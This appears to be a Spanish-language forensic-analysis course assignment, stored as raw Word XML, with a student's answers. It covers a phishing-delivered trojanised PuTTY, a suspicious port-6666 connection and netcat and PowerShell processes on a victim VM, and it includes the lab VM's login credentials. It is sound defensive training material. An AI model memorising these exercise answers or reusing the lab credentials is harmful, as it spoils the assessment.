      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
        </w:rPr>
        <w:t xml:space="preserve">. Se trata de técnicas de prevención de incidentes a través del conocimiento profundo de los sistemas de la empresa. Una de las más habituales es constituir un Red </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
        </w:rPr>
        <w:t xml:space="preserve"> o Equipo Rojo, con objeto de emular a los atacantes que dan lugar a los incidentes habituales. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
        </w:rPr>
        <w:t>El objeto de esta tarea será proponer una configuración de alto nivel para la plataforma de hacking ético de este Equipo Rojo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4BD8B7" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2F7D2"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
        </w:rPr>
        <w:t>Durante la manifestación del incidente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
        </w:rPr>
        <w:t>. Técnicas de monitorización, alerta temprana y respuesta rápida.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C5A059" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E2F7D2"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
        </w:rPr>
        <w:t>Tras la finalización del incidente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="236122"/>
        </w:rPr>
        <w:t>. Técnicas de análisis forense.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A55532" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">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En este caso práctico, nos vamos a centrar en la fase de análisis forense. Supondremos que se ha detectado una posible amenaza desde el SOC y acudimos al equipo que ha podido sufrir un ataque para analizarlo. Además, se procederá al análisis de un pen de datos que podría contener información confidencial de la empresa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5553E89D" w14:textId="26DD0F87" w:rsidR="00517A25" w:rsidRDefault="00517A25" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A97CE9" w14:textId="46299DB8" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45947E56" w14:textId="6CBF8D58" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B9E5C96" w14:textId="5552A475" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7BFEA9" w14:textId="55E57149" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E37D9D4" w14:textId="1FAC91D4" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A633680" w14:textId="0B2EA718" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17CCE7FD" w14:textId="2AEC8517" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EBA9554" w14:textId="66FF866A" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="002F5B4D">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4564EAB1" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRPr="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Ttulo"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3E5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>¿Qué te pedimos que hagas?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8C545A" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRPr="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc219084517"/>
      <w:r w:rsidRPr="000A3E5D">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
        </w:rPr>
        <w:t>Descripción de los hechos acontecidos:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="618CE88B" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:r>
        <w:t xml:space="preserve">En una mañana de trabajo del equipo de seguridad de la empresa “Unp4wn4ble </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Systems</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” saltan las alarmas en el SOC detectando una actividad sospechosa en la red interna de trabajo de la empresa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3169A0FF" w14:textId="5432D9C7" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:r>
        <w:t>El sistema IDS SIEM (detección de intrusos y manejo de eventos de seguridad) ha detectado una comunicación fuera de los normal entre dos equipos de la red.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">El equipo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Work</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-PC, con dirección IP: 10.0.2.4 ha establecido una comunicación hacia otro equipo de la red con dirección 10.0.2.7. Esta sería la comunicación establecida:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C521E32" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:r>
        <w:t>10.0.2.4:49358/TCP ↔ 10.0.2.7:6666/TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355D298C" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:r>
        <w:t>Produciéndose un tráfico de red entre estos equipos por los puertos indicados, lo cual no es usual, así que han saltado las alarmas en el SOC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520FC157" w14:textId="38A4AC32" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:r>
        <w:t xml:space="preserve">Uno de los técnicos de seguridad acude al equipo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Work</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-PC donde encuentra al usuario del equipo que está encendiendo el equipo. El técnico de seguridad le comienza a realizar una serie de preguntas para averiguar qué ha podido suceder. Tras las preguntas realizadas obtiene la siguiente información: “El usuario al llegar por la mañana comenzó con su trabajo habitual y abrió su correo electrónico donde había encontrado un nuevo correo con una versión mejorada de la herramienta “putty.exe” que suele usar para determinadas conexiones por lo que procedió a la descarga de este software y lo ejecutó para ver qué tal funciona. Tras comprobar que no veía ninguna mejora aparente, al cabo de unos minutos cerró el programa de nuevo y prosiguió con su trabajo. Todo era normal hasta que de repente el equipo se le había apagado y al encenderlo de nuevo llegó el técnico de seguridad.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41790C82" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:r>
        <w:t>Mientras el primer técnico acude al equipo indicado, otro da un aviso a seguridad para que observen si detectan algún sospechoso. Al poco tiempo, el empleado de seguridad comienza a revisar la identificación de todas las personas que intentan salir de la empresa. De repente, un chico intenta salir corriendo y el empleado forcejea con él, pero finalmente se zafa y escapa, aunque se le cae un pequeño dispositivo de un bolsillo de su chaquetón, se trata de un dispositivo USB. Este dispositivo se pone a disposición del equipo de seguridad informática de la empresa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE1B243" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:r>
        <w:t xml:space="preserve">Es el momento de que este departamento realice un análisis del equipo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Work</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-PC y del pen drive de datos. Ha llegado el momento de la investigación…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED7BE78" w14:textId="3DD99BCF" w:rsidR="000A3E5D" w:rsidRPr="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3E5D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*Nota: El análisis forense tiene una serie de fases secuenciales definidas para su correcta realización y validez. En este caso práctico vamos a reducir el análisis a la fase de recolección de evidencias del ataque sufrido, ya que la realización de todas las fases conllevaría un trabajo demasiado extenso para una realización telemática individual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563A4BA5" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRPr="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc219084518"/>
      <w:r w:rsidRPr="000A3E5D">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Apartado 1: Deducción del posible ataque sufrido.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="65B2FC40" w14:textId="603B18FB" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>Tras los datos y la información recabada por el SOC y de la declaración del trabajador. Realiza una reflexión sobre qué ha podido suceder respondiendo a las siguientes preguntas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E840A6E" w14:textId="64C9ECE1" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE776F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Con respecto al correo electrónico recibido, ¿Crees que puede estar relacionado con algún tipo de incidente según la taxonomía de incidentes de ciberseguridad? Justifica la respuesta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31915EBD" w14:textId="689C6D51" w:rsidR="00EE776F" w:rsidRDefault="00D84404" w:rsidP="00EE776F">
      <w:r>
        <w:t xml:space="preserve">Al ser un incidente en primer lugar desde un email, es un caso de phishing, ya que se suplanta una identidad y por lo que parece un exe modificado de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>putty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541AB6B5" w14:textId="77777777" w:rsidR="00D84404" w:rsidRPr="00D84404" w:rsidRDefault="00D84404" w:rsidP="00EE776F"/>
    <w:p w14:paraId="4A90D602" w14:textId="1FE02861" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84404">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>El software ejecutado por el trabajador, ¿podría tratarse de un software no legítimo o por el hecho de ejecutarlo y funcionar con normalidad podemos descartar esa teoría? ¿qué método se usa para la comprobación de la integridad de las aplicaciones descargadas?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7579D6EB" w14:textId="629648AE" w:rsidR="00D84404" w:rsidRDefault="00D84404" w:rsidP="00D84404">
      <w:r>
        <w:t>No podemos descartar de ninguna manera que no sea legítimo, ya que, aunque funcione correctamente puede realizar acciones no deseadas sin que lo sepamos, además el ordenador se le apagó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2592CC84" w14:textId="587FCE43" w:rsidR="00D84404" w:rsidRDefault="00D84404" w:rsidP="00D84404">
      <w:r>
        <w:t xml:space="preserve">La manera más segura de actualizar en este caso, sería ir directamente nosotros a la web de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>putty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y descargar desde su repositorio la ultima versión. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A18CAD0" w14:textId="3F27B447" w:rsidR="00D84404" w:rsidRDefault="00BA0A75" w:rsidP="00D84404">
      <w:r>
        <w:t>Otro modo de comprobar la integridad del archivo sería:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CB45AF" w14:textId="68150CB6" w:rsidR="00BA0A75" w:rsidRDefault="00BA0A75" w:rsidP="00BA0A75">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mediante el hash del archivo, comparándolo con el original.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9176A3" w14:textId="5835A271" w:rsidR="00BA0A75" w:rsidRPr="00D84404" w:rsidRDefault="00BA0A75" w:rsidP="00BA0A75">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mediante herramientas como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10468786" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D"/>
    <w:p w14:paraId="316EDF79" w14:textId="728F5884" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc219084519"/>
      <w:r w:rsidRPr="000A3E5D">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
        </w:rPr>
        <w:t>Apartado 2: Análisis de la máquina víctima.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0043BE10" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRPr="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D"/>
    <w:p w14:paraId="057FE925" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:r>
        <w:t xml:space="preserve">*Nota: Al pie de la práctica hay un tutorial práctico sobre el uso del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”. No es necesario realizar ninguna de las acciones que se explican en este tutorial, pero su lectura puede ser muy útil para tener más claro cómo analizar la víctima, ya que conociendo cómo se pueden atacar máquinas, se pueden analizar mejor los rastros que dejan los atacantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171FEF29" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:r>
        <w:t>Realiza una recolección de evidencias de que la máquina ha podido sufrir un ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F26ACA5" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:r>
        <w:t>Para este análisis se considera que se ha realizado una clonación del sistema y te han proporcionado una copia, que sería la que se encuentra en el siguiente recurso:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BA0AFC" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="0087FF"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>WorkPC.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="0087FF"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>o</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="0087FF"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>va</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0144459C" w14:textId="77777777" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:r>
        <w:t xml:space="preserve">Credenciales de acceso: usuario: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Clave: Unp4wn4ble</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Máquina preparada para instalar en VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332F1FE7" w14:textId="432A62D5" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:r>
        <w:t>Realiza los siguientes análisis en caso de ser posible, para ello:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1E6E81" w14:textId="46821EA2" w:rsidR="009F7434" w:rsidRDefault="009F7434" w:rsidP="000A3E5D"/>
    <w:p w14:paraId="08DE098B" w14:textId="208BC35A" w:rsidR="009F7434" w:rsidRDefault="009F7434" w:rsidP="000A3E5D">
      <w:r w:rsidRPr="009F7434">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTAS</w:t>
      </w:r>
      <w:r>
        <w:t>: Para realizar este ejercicio ejecuté un análisis conjunto, es decir fui buscando evidencias y una me llevaba a otra, luego he puesto cada análisis en su correspondiente pregunta, pero el análisis es conjunto no tiene un orden fijo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E7BD88" w14:textId="1CA5AA3C" w:rsidR="000A3E5D" w:rsidRDefault="000A3E5D" w:rsidP="000A3E5D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA0A75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>En el caso de análisis de la memoria RAM de la máquina y de cachés, ¿se podría obtener alguna información del posible ataque realizado? ¿Por qué?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8089D4" w14:textId="0129EFA8" w:rsidR="00BA0A75" w:rsidRDefault="00057EBB" w:rsidP="00BA0A75">
      <w:r>
        <w:t xml:space="preserve">Importo la imagen OVA en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y arranco la VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DB9EAD" w14:textId="051B42C6" w:rsidR="00057EBB" w:rsidRDefault="00057EBB" w:rsidP="00BA0A75">
      <w:r w:rsidRPr="00057EBB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44906F5F" wp14:editId="5BDE9587">
            <wp:extent cx="5400040" cy="29146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14650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DD5A89" w14:textId="4ECCF581" w:rsidR="00057EBB" w:rsidRDefault="00057EBB" w:rsidP="00BA0A75">
      <w:r>
        <w:t>Nada más la arranco me pide automáticamente reiniciarla para aplicar cambios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F33A92" w14:textId="64F3FB85" w:rsidR="00057EBB" w:rsidRDefault="00057EBB" w:rsidP="00BA0A75">
      <w:r>
        <w:t xml:space="preserve">Al iniciarlo de nuevo nada mas arrancar se abre y se cierra rápido unas pestañas de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, no logro sacarle foto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D233AF1" w14:textId="2A1C21C4" w:rsidR="00057EBB" w:rsidRDefault="00057EBB" w:rsidP="00BA0A75">
      <w:r>
        <w:t>Reviso el administrador de tareas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14483645" w14:textId="7EDA8C90" w:rsidR="00057EBB" w:rsidRDefault="00057EBB" w:rsidP="00BA0A75">
      <w:r w:rsidRPr="00057EBB">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EC3A5A0" wp14:editId="073106B2">
            <wp:extent cx="5400040" cy="28835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83535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="214F6F78" w14:textId="35BB091F" w:rsidR="00057EBB" w:rsidRDefault="00057EBB" w:rsidP="00BA0A75">
      <w:r>
        <w:t>Me resultan raros los siguientes procesos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6359AFF1" w14:textId="0D8C241B" w:rsidR="00057EBB" w:rsidRDefault="00057EBB" w:rsidP="00057EBB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>powershell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C61A8F5" w14:textId="5451E39E" w:rsidR="00057EBB" w:rsidRDefault="00057EBB" w:rsidP="00057EBB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nc.exe*32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64960CFF" w14:textId="54FB3E03" w:rsidR="00057EBB" w:rsidRDefault="00057EBB" w:rsidP="00057EBB">
      <w:r>
        <w:t xml:space="preserve">Reviso las tareas </w:t>
      </w:r>
      <w:r w:rsidR="006A1DA2">
        <w:t>en ejecución:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4586E489" w14:textId="29ABDF04" w:rsidR="006A1DA2" w:rsidRDefault="006A1DA2" w:rsidP="00057EBB">
      <w:r w:rsidRPr="006A1DA2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59AF569B" wp14:editId="1168AEF0">
            <wp:extent cx="5400040" cy="28854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885440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="419763EF" w14:textId="67E1AC9A" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="00057EBB"/>
    <w:p w14:paraId="57A7758C" w14:textId="4E556163" w:rsidR="00C858EA" w:rsidRDefault="00C858EA" w:rsidP="00057EBB"/>
